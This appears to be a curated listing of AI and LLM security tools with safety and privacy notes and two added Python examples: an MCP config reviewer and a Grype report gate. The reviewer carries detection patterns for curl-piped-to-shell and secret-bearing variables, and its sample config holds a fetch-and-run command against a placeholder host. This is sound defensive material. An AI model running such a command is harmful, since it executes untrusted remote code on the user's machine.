
Best AI & LLM security tools

Security tooling for AI and LLM applications — vulnerability scanning, guardrails, red-teaming, and supply-chain checks.

Curated by @heyclaude-editors Updated 2026-06-19


Compared at a glance

The top 5 picks side by side on trust, install, platform support, and disclosed notes; the full rationale for each is below.

Snyk Agent Scan (Snyk): Security scanner for discovering local AI agent components, including MCP servers and Agent Skills, and checking them for prompt injection, tool poisoning, tool shadowing, toxic flows, malware payloads, credential handling, and hardcoded secrets.

Protect AI (Protect AI): AI security platform for securing machine learning and LLM supply chains, models, applications, and infrastructure.

Cosign (Sigstore): Apache-2.0 Sigstore CLI for signing, verifying, and attesting containers, blobs, binaries, SBOMs, and OCI artifacts with keyless OIDC, KMS keys, Fulcio, Rekor, bundles, and registry storage.

Gitleaks (Gitleaks): Open-source secret scanner for finding passwords, API keys, tokens, and other credentials in git history, files, directories, and stdin.

Grype (Anchore): Apache-2.0 vulnerability scanner for container images, filesystems, archives, SBOMs, PURLs, and CPEs, with risk scoring, VEX filtering, and CI-friendly output.

Field         | Snyk Agent Scan  | Protect AI    | Cosign           | Gitleaks         | Grype
Install risk  | Review first     | Review first  | Review first     | Review first     | Review first
Notes         | Safety · Privacy | none          | Safety · Privacy | Safety · Privacy | Safety · Privacy
Category      | tools            | tools         | tools            | tools            | tools
Source        | source-backed    | source-backed | source-backed    | source-backed    | source-backed
Author        | Snyk             | Protect AI    | Sigstore         | Gitleaks         | Anchore
Added         | 2026-06-18       | 2026-04-27    | 2026-06-04       | 2026-06-03       | 2026-06-04
Platforms     | CLI              | CLI           | CLI              | CLI              | CLI
Source repo   | not listed       | not listed    | not listed       | not listed       | not listed
Safety notes

Snyk Agent Scan
  • Scanning MCP configuration files can execute the commands declared for stdio MCP servers so Agent Scan can retrieve tool descriptions. Interactive scans ask for consent before starting each stdio MCP server; review the command and arguments before approving.
  • Use `--dangerously-run-mcp-servers` only in trusted environments after verifying every MCP server command.
  • CLI output is marked experimental upstream, so avoid building brittle production parsers around issue codes or output fields without Snyk guidance.
  • Sandbox untrusted third-party MCP configs, skills, plugins, or agent workspaces before scanning.

Protect AI
  • none provided

Cosign
  • Sign container images by immutable digest rather than mutable tag so the signature is attached to the intended artifact.
  • Keyless workflows depend on OIDC issuer and subject claims; overly broad certificate identity, issuer, or regular-expression verification can approve artifacts from the wrong workflow or account.
  • Public-key, KMS, Vault, Kubernetes secret, environment-variable, and hardware-backed signing flows can expose high-value signing material if CI permissions or logs are too broad.
  • Disabling Cosign claim checks or bypassing transparency-log and timestamp expectations weakens the connection between the verified signature and the artifact being consumed.
  • Attestation and policy workflows can gate releases, deploys, or promotion decisions; review predicate schemas, policy rules, and failure behavior before enforcing them in production.
  • Cosign can upload signatures, certificates, attestations, and bundles to registries or transparency infrastructure; test registry support and cleanup behavior before relying on it.
  • Registry cleanup or deletion commands can remove signatures where the registry supports deletion, so keep release evidence retention and recovery requirements explicit.
  • Offline and air-gapped verification requires current trusted roots, bundles or signed-entry evidence, local artifacts, and a process for refreshing trust data safely.

Gitleaks
  • Gitleaks can scan git history and large directories, so scope scans intentionally and use baselines for noisy legacy repositories.
  • Findings may include real active credentials; treat reports, CI logs, and exported SARIF or JSON artifacts as sensitive.
  • The upstream README states Gitleaks is feature complete and future releases are expected to be security patches only.

Grype
  • Grype parses container images, archives, filesystems, SBOMs, package identifiers, and vulnerability data; run it from trusted automation with bounded filesystem access and resource limits for untrusted targets.
  • The install script and binary update paths should be verified before use in production CI; pin versions and checksums where reproducible builds or regulated environments require it.
  • Scanning private images can use registry credentials, client certificates, tokens, Docker or Podman daemon access, and local image metadata, so CI jobs should scope credentials and avoid broad registry permissions.
  • Vulnerability findings are advisory and depend on package detection, vulnerability database freshness, distro context, CPE matching, fix-state metadata, EPSS, KEV, and risk-scoring inputs; high-impact findings still need human triage.
  • Fail-on thresholds, only-fixed filters, only-notfixed filters, ignore rules, VEX documents, and suppressed-result settings can change pipeline outcomes, so policy changes should be reviewed like security code.
  • The configuration reference includes options for insecure registry TLS behavior and HTTP registry access; these should be avoided outside tightly controlled test environments.
  • Automatic database updates and application update checks make outbound network requests unless disabled or pinned by policy.
  • Large images, archives, monorepos, or SBOMs can produce expensive scans and large JSON/SARIF artifacts; set timeouts, artifact limits, cache policy, and retention rules in CI.
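The Snyk Agent Scan note above says an interactive scan will offer to start each stdio MCP server, and that you should read the command and arguments before approving. The script below is an added example for this list, not Snyk's code: it enumerates every local process an agent configuration would spawn and flags launch commands that deserve a hard look (remote fetch-and-execute, shell wrappers, unpinned `npx`/`uvx` packages, secrets passed through `env`). It assumes the `{"mcpServers": {name: {"command", "args", "env"}}}` layout used by several desktop agents; the risk patterns are an illustrative heuristic and the sample config is constructed.

```python
"""Review the stdio MCP servers an agent configuration would launch.

Added example for this list, not Snyk Agent Scan's own code. Assumes the
{"mcpServers": {name: {"command", "args", "env"}}} layout; the risk patterns
are an illustrative heuristic and SAMPLE_CONFIG is constructed.
"""
import json
import re

# Heuristics for launch commands that should not be approved blindly at the
# consent prompt (and never with --dangerously-run-mcp-servers).
RISKY_PATTERNS = {
    "remote_fetch_exec": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    # npx/uvx without a version pin resolve to whatever the registry serves today
    "unpinned_npx": re.compile(r"^npx\s+(?:-y\s+|--yes\s+)?(?!.*@\d)"),
    "unpinned_uvx": re.compile(r"^uvx\s+(?!.*(?:@|==)\d)"),
    "shell_wrapper": re.compile(r"^(?:sh|bash|zsh|cmd(?:\.exe)?|powershell(?:\.exe)?)\s+(?:-c|/c)\b"),
    "inline_python": re.compile(r"^python\S*\s+-c\b"),
}
SECRET_ENV_KEY = re.compile(r"TOKEN|SECRET|PASSWORD|API_KEY|PRIVATE_KEY", re.I)


def iter_stdio_servers(config: dict):
    """Yield (name, command line, env) for every server that spawns a local process.
    Entries that only carry a 'url' are remote transports and spawn nothing locally."""
    for name, spec in (config.get("mcpServers") or {}).items():
        if not isinstance(spec, dict) or "command" not in spec:
            continue
        argv = [str(spec["command"])] + [str(a) for a in spec.get("args") or []]
        yield name, " ".join(argv), dict(spec.get("env") or {})


def review_mcp_config(config: dict) -> list[dict]:
    """One record per stdio server: the exact command line and the heuristics it trips."""
    records = []
    for name, cmdline, env in iter_stdio_servers(config):
        flags = [label for label, rx in RISKY_PATTERNS.items() if rx.search(cmdline)]
        secret_keys = sorted(k for k in env if SECRET_ENV_KEY.search(k))
        if secret_keys:
            # the value is visible to the spawned process and may surface in scan output
            flags.append("env_carries_secret")
        records.append({"server": name, "command": cmdline, "flags": flags, "secret_env": secret_keys})
    return records


# Constructed sample config; package names, paths and hosts are placeholders.
SAMPLE_CONFIG = json.loads(r'''
{
  "mcpServers": {
    "filesystem": {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/home/dev/projects"]},
    "db": {"command": "uvx", "args": ["mcp-server-postgres==0.4.1"], "env": {"PGPASSWORD": "hunter2"}},
    "helper": {"command": "sh", "args": ["-c", "curl -fsSL https://example.invalid/boot.sh | sh"]},
    "docs": {"url": "https://example.invalid/mcp"}
  }
}
''')

if __name__ == "__main__":
    for rec in review_mcp_config(SAMPLE_CONFIG):
        verdict = "REVIEW" if rec["flags"] else "ok"
        print(f'{verdict:6} {rec["server"]:12} {rec["command"]}  flags={rec["flags"]}')
```

Run it against the config file the agent actually loads before answering the consent prompt; a server that trips `remote_fetch_exec` or `shell_wrapper` is one to inspect in a sandbox rather than approve. The `docs` entry is skipped deliberately: it is a remote transport and starts no local process, which is exactly the distinction the consent prompt is about.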
Privacy notes

Snyk Agent Scan
  • Agent Scan can discover local agent configuration paths, MCP server names, commands, arguments, tool names, descriptions, prompts, resources, skill text, and local component inventories.
  • The README states skills, agent applications, tool names, and descriptions are shared with Snyk for validation.
  • Control-server bootstrap can send redacted CLI args, OS and Python details, hostname, username, shell, locale, timezone, working directory, home directory, executable path, and readable home-directory metadata when enabled.
  • Review Snyk Agent Scan terms, enterprise deployment guidance, and organization policy before scanning customer data, proprietary skills, or sensitive agent configurations.

Protect AI
  • none provided

Cosign
  • Keyless signing can publish email addresses, OIDC identities, certificate metadata, timestamps, and transparency-log records that are intentionally public and may be permanent.
  • Registry-stored signatures, certificates, attestations, OCI referrers, annotations, and bundles can reveal image names, digests, artifact relationships, workflow identity, and release metadata.
  • Sigstore bundles can include signatures, certificates, timestamps, transparency-log inclusion proofs, and issuer or subject details that should be reviewed before publishing.
  • CI logs and artifacts can expose image references, registry hosts, certificate identities, issuer URLs, workflow paths, annotations, KMS URIs, bundle paths, and verification payloads.
  • Cloud KMS, Vault, registry, GitHub Actions, GitLab CI, and other identity providers may receive authentication, authorization, and audit metadata when Cosign signs or verifies artifacts.
  • Private keys, KMS credentials, registry tokens, client certificates, OIDC tokens, and signing environment variables should be scoped, rotated, masked, and excluded from generated artifacts.

Gitleaks
  • Scans inspect repository contents, file contents, commit metadata, and streamed input for credential-like strings.
  • Report files and verbose logs can contain secret values unless redaction and artifact retention are configured carefully.
  • CI integrations may expose findings to workflow logs, code-scanning systems, or third-party build infrastructure.

Grype
  • The Grype getting-started docs say Grype runs locally and does not send scan data to external services; it needs internet access for downloading container images and the vulnerability database.
  • Pulling images from remote or private registries can disclose image names, tags, digests, registry hostnames, platform requests, authentication attempts, and network metadata to registry infrastructure.
  • Scan output can reveal package names, package versions, ecosystems, distro names, image identifiers, file metadata, file digests, executable metadata, vulnerability identifiers, fix versions, EPSS, KEV, risk scores, and suppressed findings.
  • JSON, SARIF, CycloneDX, and template outputs are useful for automation but can leak dependency inventory and security posture when uploaded to CI logs, code scanning tools, tickets, dashboards, or long-retention artifacts.
  • Configuration files and environment variables can include registry usernames, passwords, tokens, client certificates, client keys, CA certificates, cache paths, update URLs, ignore rules, VEX documents, and output paths.
  • SBOM inputs may contain full dependency inventories and build metadata; treat Grype reports and source SBOMs as security-sensitive artifacts.
Prerequisites

Snyk Agent Scan
  • Python 3.10 or newer, through uv/uvx or another supported Python package execution path.
  • A Snyk account and `SNYK_TOKEN` environment variable for scan verification.
  • Permission to inspect the local user's AI agent configuration files, MCP server configs, and Agent Skill directories.
  • A sandbox, VM, container, or disposable environment when scanning untrusted MCP configs.

Protect AI
  • none listed

Cosign
  • Cosign installed from an official or trusted path such as GitHub releases, Homebrew, Go install, a Linux package, the official container image, or a CI installer action.
  • Artifact target plan for container images by digest, local blobs, binaries, SBOMs, WASM modules, Tekton bundles, OCI artifacts, or release files.
  • Signing identity or key plan covering keyless OIDC, expected certificate identity and issuer, self-managed keys, hardware keys, KMS, Vault, Kubernetes secrets, PKCS11, or custom PKI.
  • Registry and artifact-storage plan for OCI referrers, signature artifacts, private registry authentication, local bundles, offline verification, and later upload workflows.

Gitleaks
  • A repository, directory, file, or stdin stream that you are authorized to scan.
  • Gitleaks installed through Homebrew, Docker, Go, a release binary, pre-commit, or the official GitHub Action.
  • A plan for handling findings, baselines, and allowed test credentials without exposing real secrets in reports.

Grype
  • Grype installed from an official or trusted package path such as the Anchore install script, Homebrew, Windows package manager, Docker image, or GitHub release.
  • Target selection for container images, registries, Docker, Podman, containerd, OCI archives, Docker archives, Singularity images, directories, files, SBOMs, Package URLs, or CPEs.
  • Vulnerability database update policy, cache directory, offline scanning expectations, database age policy, and network allowance for database downloads.
  • CI policy for output formats, JSON/SARIF artifacts, fail-on severity thresholds, fix-state filters, VEX documents, ignore rules, and suppressed-result review.
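The Grype prerequisites and safety notes both say that fail-on thresholds, fix-state filters, VEX documents and ignore rules "can change pipeline outcomes" and should be reviewed like security code. The block below is an added example for this list, not Anchore's code: it applies a CI gate to a report and keeps an audit trail of every finding a filter removed, so a pipeline that suddenly goes green can show why. `SAMPLE_REPORT` is a constructed document shaped like Grype's JSON output (`matches[].vulnerability.{id,severity,fix.state}` and `matches[].artifact.{name,version}`) with placeholder CVE identifiers; the `suppressed` set stands in for an ignore rule or a VEX not-affected statement.

```python
"""Apply a CI gate to a Grype-style report and record what each filter dropped.

Added example for this list, not Anchore's code. SAMPLE_REPORT is constructed
and only shaped like Grype's JSON output; the CVE ids are placeholders and the
suppressed set stands in for an ignore rule or VEX statement.
"""
import json

SEVERITY_RANK = {"Negligible": 0, "Low": 1, "Medium": 2, "High": 3, "Critical": 4}

SAMPLE_REPORT = json.loads(r'''
{
  "matches": [
    {"vulnerability": {"id": "CVE-0000-0001", "severity": "Critical", "fix": {"state": "not-fixed", "versions": []}},
     "artifact": {"name": "libfoo", "version": "1.0.0", "type": "deb"}},
    {"vulnerability": {"id": "CVE-0000-0002", "severity": "High", "fix": {"state": "fixed", "versions": ["2.1.1"]}},
     "artifact": {"name": "libbar", "version": "2.1.0", "type": "deb"}},
    {"vulnerability": {"id": "CVE-0000-0003", "severity": "Medium", "fix": {"state": "fixed", "versions": ["0.9.2"]}},
     "artifact": {"name": "libbaz", "version": "0.9.1", "type": "python"}}
  ]
}
''')


def gate(report: dict, fail_on: str, only_fixed: bool = False,
         suppressed: frozenset = frozenset()) -> dict:
    """Return the verdict plus an audit trail of every finding the filters removed.

    Severities outside SEVERITY_RANK (for example "Unknown") never trip the gate here;
    that is a policy choice to review, because it silently excludes unrated findings.
    """
    threshold = SEVERITY_RANK[fail_on]
    failing, dropped = [], []
    for m in report["matches"]:
        vuln, art = m["vulnerability"], m["artifact"]
        key = f'{vuln["id"]}:{art["name"]}@{art["version"]}'
        fix_state = (vuln.get("fix") or {}).get("state", "unknown")
        if vuln["id"] in suppressed:
            dropped.append((key, "suppressed"))
            continue
        if only_fixed and fix_state != "fixed":
            # an only-fixed policy hides unfixed findings regardless of severity
            dropped.append((key, f"fix-state={fix_state}"))
            continue
        if SEVERITY_RANK.get(vuln["severity"], -1) >= threshold:
            failing.append(key)
    return {"fail": bool(failing), "failing": failing, "dropped": dropped}


if __name__ == "__main__":
    print("fail-on High:               ", gate(SAMPLE_REPORT, "High"))
    print("+ only-fixed:               ", gate(SAMPLE_REPORT, "High", only_fixed=True))
    print("+ only-fixed, suppress 0002:",
          gate(SAMPLE_REPORT, "High", only_fixed=True, suppressed=frozenset({"CVE-0000-0002"})))
```

The same three findings fail the gate, then pass it, without a single package changing: `only_fixed` removes the unfixed Critical and one suppression removes the remaining High. Printing `dropped` next to the verdict is the cheap way to make that visible in a CI log, and it is the review artifact the safety notes are asking for when they say to treat policy changes like code.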
Install
  • Snyk Agent Scan: `uvx snyk-agent-scan@latest`
  • Protect AI, Cosign, Gitleaks, Grype: not listed here (see each tool's prerequisites for supported install paths)

Config
  • none listed

Citations
  • none listed

Claim
  • Unclaimed for all five picks
  1. Snyk Agent Scan
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  2. Protect AI
     Why it made the cut: source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  3. Cosign
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  4. Gitleaks
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  5. Grype
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  6. Kubescape
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  7. OpenSandbox
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  8. Semgrep
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  9. Syft
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  10. Lakera Guard
     Why it made the cut: privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  11. Promptfoo
     Why it made the cut: privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  12. Garak
     Why it made the cut: source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  13. Microsoft PyRIT
     Why it made the cut: safety notes present, privacy notes present, source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

  14. Giskard
     Why it made the cut: source-backed.
     Reach for instead: If this will touch credentials, local files, or production systems, inspect the upstream source first.

Missing a pick? Propose an edit to this list — every change goes through the same review queue as new entries.
